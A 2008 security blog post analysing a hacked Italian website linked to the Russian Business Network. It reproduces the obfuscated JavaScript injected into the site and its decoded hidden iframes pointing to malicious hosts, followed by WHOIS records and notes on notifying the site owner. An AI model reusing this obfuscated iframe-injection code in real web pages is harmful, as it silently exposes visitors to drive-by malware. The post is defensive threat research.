Blog for hpHosts, and whatever else I feel like writing about ....

Tuesday, 7 October 2008

Russian Business Network having fun in Italy

It seems the RBN are having a little fun in Italy at the moment. I came across the following website that appears to have been hacked;

obiettivorisarcimento.it

The code thats been added is;

e = '0x00' + '24';str1 = "%9F%C7%CC%D1%BB%D6%D7%DC%CF%C0%98%85%D1%CC%D6%CC%C5%CC%CF%CC%D7%DC%9D%C3%CC%C7%C7%C0%C9%85%99%9F%CC%C1%D5%C4%C8%C0%BB%D6%D5%C6%98%85%C3%D7%D7%CB%9D%8A%8A%D6%D0%D1%C6%C9%D7%89%C6%CA%C8%8A%CF%C7%8A%D0%CB%CF%8A%85%BB%D2%CC%C7%D7%C3%98%94%BB%C3%C0%CC%C2%C3%D7%98%94%99%9F%8A%CC%C1%D5%C4%C8%C0%99%9F%8A%C7%CC%D1%99";str=tmp='';for(i=0;i<str1.length;i+=3){tmp = unescape(str1.slice(i,i+3));str=str+String.fromCharCode((tmp.charCodeAt(0)^e)-127);}document.write(str);


And just below the closing HTML tag;

document.write(unescape('%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%6A%61%76%61%73%63%72%69%70%74%22%3E%66%75%6E%63%74%69%6F%6E%20%64%46%28%73%29%7B%76%61%72%20%73%31%3D%75%6E%65%73%63%61%70%65%28%73%2E%73%75%62%73%74%72%28%30%2C%73%2E%6C%65%6E%67%74%68%2D%31%29%29%3B%20%76%61%72%20%74%3D%27%27%3B%66%6F%72%28%69%3D%30%3B%69%3C%73%31%2E%6C%65%6E%67%74%68%3B%69%2B%2B%29%74%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%73%31%2E%63%68%61%72%43%6F%64%65%41%74%28%69%29%2D%73%2E%73%75%62%73%74%72%28%73%2E%6C%65%6E%67%74%68%2D%31%2C%31%29%29%3B%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%75%6E%65%73%63%61%70%65%28%74%29%29%3B%7D%3C%2F%73%63%72%69%70%74%3E'));dF('%286Fkwpo%286H%283D%286Fliudph%2853VUF%286G%2855kwws%286D22%3B41%3C8147%3B1752vwdw42lqgh%7B1sks%2855%2853ZLGWK%286G4833%2853KHLJKW%286G4833%2853vw%7Coh%286G%2855glvsod%7C%286Dqrqh%2855%286H%286F2liudph%286H%283D%286F2kwpo%286H3')
document.write(unescape('%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%6A%61%76%61%73%63%72%69%70%74%22%3E%66%75%6E%63%74%69%6F%6E%20%64%46%28%73%29%7B%76%61%72%20%73%31%3D%75%6E%65%73%63%61%70%65%28%73%2E%73%75%62%73%74%72%28%30%2C%73%2E%6C%65%6E%67%74%68%2D%31%29%29%3B%20%76%61%72%20%74%3D%27%27%3B%66%6F%72%28%69%3D%30%3B%69%3C%73%31%2E%6C%65%6E%67%74%68%3B%69%2B%2B%29%74%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%73%31%2E%63%68%61%72%43%6F%64%65%41%74%28%69%29%2D%73%2E%73%75%62%73%74%72%28%73%2E%6C%65%6E%67%74%68%2D%31%2C%31%29%29%3B%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%75%6E%65%73%63%61%70%65%28%74%29%29%3B%7D%3C%2F%73%63%72%69%70%74%3E'));dF('%286Fkwpo%286H%283D%286Fliudph%2853VUF%286G%2855kwws%286D22%3B41%3C8147%3B1752vwdw42lqgh%7B1sks%2855%2853ZLGWK%286G4833%2853KHLJKW%286G4833%2853vw%7Coh%286G%2855glvsod%7C%286Dqrqh%2855%286H%286F2liudph%286H%283D%286F2kwpo%286H3')


This decodes to;

<div style="visibility:hidden"><iframe src="http://suvcnt.com/ld/upl/" width=1 height=1></iframe></div><script language="javascript">function dF(s){var s1=unescape(s.substr(0,s.length-1)); var t='';for(i=0;i<s1.length;i++)t+=String.fromCharCode(s1.charCodeAt(i)-s.substr(s.length-1,1));document.write(unescape(t));}</script><html>
<iframe SRC="http://81.95.148.42/stat1/index.php" WIDTH=1500 HEIGHT=1500 style="display:none"></iframe>
</html><script language="javascript">function dF(s){var s1=unescape(s.substr(0,s.length-1)); var t='';for(i=0;i<s1.length;i++)t+=String.fromCharCode(s1.charCodeAt(i)-s.substr(s.length-1,1));document.write(unescape(t));}</script><html>
<iframe SRC="http://81.95.148.42/stat1/index.php" WIDTH=1500 HEIGHT=1500 style="display:none"></iframe>
</html>


Ref:
http://vurl.mysteryfcm.co.uk/?url=133246

suvcnt.com is not surprisingly, sharing an IP block with 330 other nasties;

http://hosts-file.net/pest.asp?show=69.64.155.

... and perhaps even less surprising, is the IP blocks owner;

OrgName: eNom, Incorporated
OrgID: ENOM
Address: 15801 NE 24th Street
City: Bellevue
StateProv: WA
PostalCode: 98008
Country: US

NetRange: 69.64.144.0 - 69.64.159.255
CIDR: 69.64.144.0/20
OriginAS: AS21740
NetName: ENOM-BLOCK
NetHandle: NET-69-64-144-0-1
Parent: NET-69-0-0-0-0
NetType: Direct Assignment
NameServer: HK1.NAME-SERVICES.COM
NameServer: HK2.NAME-SERVICES.COM
Comment:
RegDate: 2007-07-25
Updated: 2008-07-01

RAbuseHandle: DEMAN-ARIN
RAbuseName: DemandMedia NOC
RAbusePhone: +1-425-274-4500
RAbuseEmail: dmnoc@demandmedia.com

RNOCHandle: DEMAN-ARIN
RNOCName: DemandMedia NOC
RNOCPhone: +1-425-274-4500
RNOCEmail: dmnoc@demandmedia.com

RTechHandle: RSI80-ARIN
RTechName: Singh, Raj
RTechPhone: +1-425-274-4500
RTechEmail: raj.singh@demandmedia.com

OrgAbuseHandle: DEMAN-ARIN
OrgAbuseName: DemandMedia NOC
OrgAbusePhone: +1-425-274-4500
OrgAbuseEmail: dmnoc@demandmedia.com

OrgNOCHandle: DEMAN-ARIN
OrgNOCName: DemandMedia NOC
OrgNOCPhone: +1-425-274-4500
OrgNOCEmail: dmnoc@demandmedia.com

OrgTechHandle: RSI80-ARIN
OrgTechName: Singh, Raj
OrgTechPhone: +1-425-274-4500
OrgTechEmail: raj.singh@demandmedia.com


Yuppers folks - it's Enom, otherwise known as the absolute joke I blogged about previously.

81.95.148.42 however, which you may have noticed, is also contacted, courtesy of;

81.95.148.42/stat1/

.... this is the one we're interested in here. The reason we're interested in this, is it's owner;

inetnum: 81.95.148.0 - 81.95.151.255
netname: RBNET
descr: RBusiness Network
country: PA
admin-c: RNR4-RIPE
tech-c: RNR4-RIPE
status: ASSIGNED PA
mnt-by: RBN-MNT
source: RIPE # Filtered

role: RBusiness Network Registry
address: RBusiness Network
address: The Century Tower Building
address: Ricardo J. Alfari Avenue
address: Panama City
address: Republic of Panama
phone: +1 401 369 8152
remarks: Points of contact for RBusiness Network Operations
remarks: ------------------------------------------------------
remarks: Routing and peering issues: noc@rbnnetwork.com
remarks: SPAM and Network security issues: abuse@rbnnetwork.com
remarks: Customer support: support@rbnnetwork.com
remarks: General information: info@rbnnetwork.com
remarks: ------------------------------------------------------
e-mail: noc@rbnnetwork.com
admin-c: JK4668-RIPE
tech-c: JI424-RIPE
nic-hdl: RNR4-RIPE
mnt-by: RBN-MNT
source: RIPE # Filtered

:: Information related to '81.95.148.0/22AS40989'

route: 81.95.148.0/22
descr: RBNetwork
origin: AS40989
mnt-by: RBN-MNT
source: RIPE # Filtered


Recognize the name? There's no domains on this IP at present by the looks of it (or at least, none on the hpHosts database, and querying via passive DNS showed no hits), but I'll be watching.

Sadly, attempts to obtain the content of the RBN URL failed (server connection error), but in the meantime, obiettivorisarcimento.it have been contacted and notified that their server has been compromised, and I'll be monitoring it to ensure it's cleaned up (if anyone reading this, happens to be Italy, feel free to give them a call and let them know - just incase the email takes a while to get through).

No comments: